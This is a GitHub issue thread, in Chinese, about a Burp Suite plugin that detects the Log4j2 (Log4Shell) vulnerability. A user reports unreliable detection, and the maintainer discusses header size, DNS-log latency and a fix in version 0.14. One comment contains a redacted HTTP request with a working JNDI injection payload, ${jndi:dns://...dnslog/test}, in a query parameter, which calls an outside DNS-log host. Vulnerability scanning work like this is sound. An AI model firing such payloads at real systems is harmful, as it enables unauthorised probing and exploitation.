### ISSUE TITLE
测试了几个站点，只有第一个检测成功

### ISSUE THREAD

**Issue by peilipeili** [f0ng/log4j2burpscanner#5]
在本地搭建的两个靶机（post请求），还有一个真实站点(get请求)，依次手工测试都存在漏洞的，但是插件只检测到最开始的一个存在漏洞，后面的两个站都没有检测到

**Comment by peilipeili** [comment]
好像跟先后没有关系，能检测到漏洞的那个靶机，在另一台电脑上用burp插件测试又检测不到了，换了ceye.io的dnslog也不行，好像是不太稳定的样子

**Comment by f0ng** [comment]
感谢师傅反馈，靶场问题可能是请求头过大，或者畸形请求头问题，将在下个版本更新，进行请求头参数可控
另，dnslog问题取决于网络环境与dns平台的延迟。能否方便发一下脱敏后的真实站点数据包

**Comment by peilipeili** [comment]
> 

GET /aa/bb/cc?_=1639374981551&action=CREATE&autoAddReplicas=false&collection.configName=&maxShardsPerNode=1&name=${jndi:dns://223322.dnslog/test}&numShards=1&replicationFactor=1&router.name=compositeId&wt=json HTTP/1.1
Host: xx:xx:xx:xx:1234
Accept: application/json, text/plain, */*
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Referer: http://xx:xx:xx:xx:1234/aa
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


手工测试得知 get 请求中的 name 参数是存在漏洞的

**Comment by f0ng** [comment]
感谢！

**Comment by f0ng** [comment]
`0.14`版本已可控payload的参数
